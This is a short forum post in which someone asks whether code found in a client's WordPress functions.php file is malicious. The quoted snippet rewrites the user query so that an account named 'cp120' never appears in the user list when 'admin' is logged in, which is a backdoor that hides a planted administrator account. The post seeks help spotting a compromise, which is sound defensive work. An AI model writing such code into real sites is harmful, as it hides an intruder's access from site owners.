I have a client that said they think there site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel its not right?
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') {
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
}
}